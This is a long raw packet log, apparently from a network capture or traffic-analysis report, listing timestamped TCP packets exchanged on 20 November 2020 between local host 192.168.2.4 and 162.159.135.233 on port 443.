                                                                                                                                                Nov 20, 2020 11:26:39.686158895 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686173916 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686213017 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686213970 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686230898 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686240911 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686264992 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686275959 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686296940 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686302900 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686333895 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686342001 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686355114 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686376095 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686400890 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686409950 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686434031 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686444044 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.686472893 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.686496973 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.691190958 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.691533089 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.691626072 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.691773891 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.691809893 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.691837072 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.691859961 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.691951990 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.691983938 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692018986 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692027092 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692042112 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692085981 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692109108 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692142010 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692173958 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692181110 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692198992 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692200899 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692231894 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692236900 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692257881 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692266941 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692289114 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692301035 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692318916 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692333937 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692363977 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692363977 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692385912 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692400932 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692421913 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692435026 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692464113 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692471027 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692485094 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692506075 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692526102 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692533970 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692569017 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692570925 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692589998 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692595005 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692631006 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692636967 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692647934 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692670107 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692689896 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692704916 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692727089 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692739964 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692754984 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692775011 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692795992 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692809105 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692832947 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692843914 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692863941 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692878008 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692894936 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692912102 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692935944 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692946911 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692981005 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.692981005 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.692996025 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693012953 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693037987 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693049908 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693078041 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693084002 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693099022 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693116903 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693139076 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693188906 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693203926 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693238020 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693263054 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693270922 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693281889 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693308115 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693342924 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693358898 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693368912 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693372965 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693435907 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693466902 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693470001 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693480968 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693495989 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693512917 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693870068 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693916082 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693936110 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693948984 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.693965912 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.693981886 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694008112 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694015980 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694036007 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694067001 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694132090 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694165945 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694195986 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694200039 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694217920 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694259882 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694304943 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694344997 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694370031 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694376945 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694405079 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694407940 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694432974 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694466114 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694494009 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694570065 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694577932 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694612980 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694642067 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694647074 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694657087 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694681883 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694715977 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694732904 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694792986 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694828987 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694855928 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694864035 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694900036 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694901943 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.694914103 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.694963932 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695023060 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695059061 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695091009 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695091009 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695108891 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695131063 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695149899 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695199013 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695349932 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695394039 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695425034 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695427895 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695447922 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695460081 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695491076 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695497990 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695517063 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695521116 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695545912 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695555925 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695590019 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695590973 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695611000 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695616961 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695652008 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695684910 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.695941925 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.695986986 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696002960 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696019888 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696044922 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696053982 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696094036 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696110010 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696166039 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696202993 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696227074 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696234941 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696268082 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696285009 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696341038 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696374893 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696400881 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696405888 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696438074 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696456909 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696482897 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696543932 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696559906 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696593046 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696625948 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696626902 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696641922 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696660042 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696685076 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696718931 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696763992 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696799040 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696820021 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696831942 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696865082 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696867943 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.696882010 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696923018 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.696974039 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697006941 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697030067 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697040081 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697063923 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697096109 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697233915 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697273016 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697293043 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697308064 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697333097 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697343111 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697360992 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697377920 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697417021 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697427988 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697428942 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697462082 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697494984 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697496891 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.697513103 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.697559118 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.707775116 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.707875967 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.707895994 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.707926035 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.707978010 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.708036900 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708040953 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.708137989 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708152056 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.708257914 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.708463907 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708493948 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708548069 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708550930 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.708605051 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708607912 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.708622932 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708647013 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708662987 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708698988 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708708048 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.708719015 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708748102 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708767891 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708791018 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708808899 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708815098 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.708826065 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708859921 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708877087 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708898067 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708916903 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708937883 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708960056 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.708980083 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.708981037 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709007025 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709028006 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709044933 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709055901 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.709067106 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709100008 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709117889 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709121943 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.709141016 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709165096 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709188938 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709209919 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709220886 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.709239006 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709264040 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709285021 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.709289074 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709316015 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709333897 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709333897 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.709359884 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709378004 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709428072 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709445953 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709465981 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709486008 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709501028 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.709506989 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709538937 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709558964 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.709573030 CET49734443192.168.2.4162.159.135.233
